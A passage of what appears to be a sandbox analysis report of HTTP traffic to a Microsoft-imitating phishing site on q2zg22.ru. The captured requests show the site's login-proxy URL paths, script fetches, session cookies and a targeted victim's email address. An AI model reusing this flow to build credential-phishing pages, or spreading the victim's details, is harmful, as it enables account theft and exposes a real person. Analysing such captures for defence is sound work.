.AspNetCore.Correlation.f46ORRH2Bty5lbsVWkATAtq4SHSGXz7ETalHeFWH9jA=N; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: ywnjb.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; uaid=b5123cc0b5d34caeb3ca87efc9184692; MSPRequ=id=N&lt=1706901469&co=1; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0 HTTP/1.1Host: office.q2zg22.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://galeonconstruction.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-0b0GHFUjypDPzYyRCP-j910iLVEABaRccpLk36B5zRBtQ3fob97QdMrqXsjTd5l0xaaXKm_REXXPLeGuMeGr-7qB7U4XkFGuAUABRnZJpCMgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Aetvl2btd8aqo8wzaMiV5Hf2kdb_IwSVTXuYe0uiIoKycm_q9g-RAse7WQ2x09SHTppANz6TPXL3R5FlIm2flV7nWh7dn4CXmsH-QoXUY5sWlBYRvTFD7wAAZHOGThUh_jbLwMoU4B1IcbiFQee9HxB3lxm4BtjIgZpVmvHJBF0gAA; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; fpc=Aq_odsI7GDJHm8suSWCV-X8; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=
              Source: global trafficHTTP traffic detected: GET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js HTTP/1.1Host: office.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-boMTZDEK31Q8YeqQNlfeZUoRfNsDRRPRvViO-GhTigwwBRK7ud8gg8Ns4yNqBH-tzw5bscmKyh59lNlT60JCz7Rwp4nwWHZ75wZ4ilsHRBogAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-w9y33GwHLRg75rjQ3nRfMFBNBJkRrnhLX8AcE24nRe-39xD3h6Hmaa_3zGrAfFX7O4WZ6VUmijaUiKhxJi9TS0fB3rz4i-XZ71ipeFm4Nb3CfO5Ubjg8SZH5niiXfSczBjYmdPttlkJUE6hJp2JxRjXmN5a8aDkLuanuiU1y-KQgAA; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA
              Source: global trafficHTTP traffic detected: GET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js HTTP/1.1Host: office.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-boMTZDEK31Q8YeqQNlfeZUoRfNsDRRPRvViO-GhTigwwBRK7ud8gg8Ns4yNqBH-tzw5bscmKyh59lNlT60JCz7Rwp4nwWHZ75wZ4ilsHRBogAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-w9y33GwHLRg75rjQ3nRfMFBNBJkRrnhLX8AcE24nRe-39xD3h6Hmaa_3zGrAfFX7O4WZ6VUmijaUiKhxJi9TS0fB3rz4i-XZ71ipeFm4Nb3CfO5Ubjg8SZH5niiXfSczBjYmdPttlkJUE6hJp2JxRjXmN5a8aDkLuanuiU1y-KQgAA; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA
              Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: ywnjb.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; uaid=5b55c0a44eaf49cfa2da2d65c6420b02; MSPRequ=id=N&lt=1706901471&co=2
              Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: ywnjb.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; uaid=71c5bddea9a94fd68abbc95643963793; MSPRequ=id=N&lt=1706901473&co=3
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_7582d7648944aa49d261.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /common/GetCredentialType?mkt=en-US HTTP/1.1Host: office.q2zg22.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-boMTZDEK31Q8YeqQNlfeZUoRfNsDRRPRvViO-GhTigwwBRK7ud8gg8Ns4yNqBH-tzw5bscmKyh59lNlT60JCz7Rwp4nwWHZ75wZ4ilsHRBogAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-w9y33GwHLRg75rjQ3nRfMFBNBJkRrnhLX8AcE24nRe-39xD3h6Hmaa_3zGrAfFX7O4WZ6VUmijaUiKhxJi9TS0fB3rz4i-XZ71ipeFm4Nb3CfO5Ubjg8SZH5niiXfSczBjYmdPttlkJUE6hJp2JxRjXmN5a8aDkLuanuiU1y-KQgAA; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA
              Source: global trafficHTTP traffic detected: GET /oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNmgiDPuF7RBPuj5SL3QM3C4M1Kh06FbCzoMkifzVJpPWCAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.com HTTP/1.1Host: ywnjb.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; uaid=b0dc3974b8144bacb6be6048a6beb6a3; MSPRequ=id=N&lt=1706901474&co=4
